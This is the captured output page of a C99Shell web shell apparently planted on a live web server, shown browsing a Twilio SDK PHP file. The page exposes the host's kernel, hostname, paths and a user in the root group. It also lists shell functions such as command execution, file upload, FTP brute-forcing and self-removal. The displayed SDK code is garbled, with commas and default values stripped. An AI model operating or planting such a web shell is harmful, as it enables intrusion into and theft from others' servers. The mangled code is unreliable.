!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/twilio/sdk/src/Twilio/Rest/Messaging/V1/   drwxrwxr-x
Free 28.66 GB of 117.98 GB (24.29%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     BrandRegistrationOptions.php (3.63 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\Messaging\V1;

use 
Twilio\Options;
use 
Twilio\Values;

/**
 * PLEASE NOTE that this class contains beta products that are subject to change. Use them with caution.
 */
abstract class BrandRegistrationOptions {
    
/**
     * @param string $brandType Type of brand being created. One of: "STANDARD",
     *                          "STARTER".
     * @param bool $mock A boolean that specifies whether brand should be a mock or
     *                   not. If true, brand will be registered as a mock brand.
     *                   Defaults to false if no value is provided.
     * @param bool $skipAutomaticSecVet Skip Automatic Secondary Vetting
     * @return CreateBrandRegistrationOptions Options builder
     */
    
public static function create(string $brandType Values::NONEbool $mock Values::NONEbool $skipAutomaticSecVet Values::NONE): CreateBrandRegistrationOptions {
        return new 
CreateBrandRegistrationOptions($brandType$mock$skipAutomaticSecVet);
    }
}

class 
CreateBrandRegistrationOptions extends Options {
    
/**
     * @param string $brandType Type of brand being created. One of: "STANDARD",
     *                          "STARTER".
     * @param bool $mock A boolean that specifies whether brand should be a mock or
     *                   not. If true, brand will be registered as a mock brand.
     *                   Defaults to false if no value is provided.
     * @param bool $skipAutomaticSecVet Skip Automatic Secondary Vetting
     */
    
public function __construct(string $brandType Values::NONEbool $mock Values::NONEbool $skipAutomaticSecVet Values::NONE) {
        
$this->options['brandType'] = $brandType;
        
$this->options['mock'] = $mock;
        
$this->options['skipAutomaticSecVet'] = $skipAutomaticSecVet;
    }

    
/**
     * Type of brand being created. One of: "STANDARD", "STARTER". STARTER is for low volume, starter use cases. STANDARD is for all other use cases.
     *
     * @param string $brandType Type of brand being created. One of: "STANDARD",
     *                          "STARTER".
     * @return $this Fluent Builder
     */
    
public function setBrandType(string $brandType): self {
        
$this->options['brandType'] = $brandType;
        return 
$this;
    }

    
/**
     * A boolean that specifies whether brand should be a mock or not. If true, brand will be registered as a mock brand. Defaults to false if no value is provided.
     *
     * @param bool $mock A boolean that specifies whether brand should be a mock or
     *                   not. If true, brand will be registered as a mock brand.
     *                   Defaults to false if no value is provided.
     * @return $this Fluent Builder
     */
    
public function setMock(bool $mock): self {
        
$this->options['mock'] = $mock;
        return 
$this;
    }

    
/**
     * A flag to disable automatic secondary vetting for brands which it would otherwise be done.
     *
     * @param bool $skipAutomaticSecVet Skip Automatic Secondary Vetting
     * @return $this Fluent Builder
     */
    
public function setSkipAutomaticSecVet(bool $skipAutomaticSecVet): self {
        
$this->options['skipAutomaticSecVet'] = $skipAutomaticSecVet;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.Messaging.V1.CreateBrandRegistrationOptions ' $options ']';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0114 ]--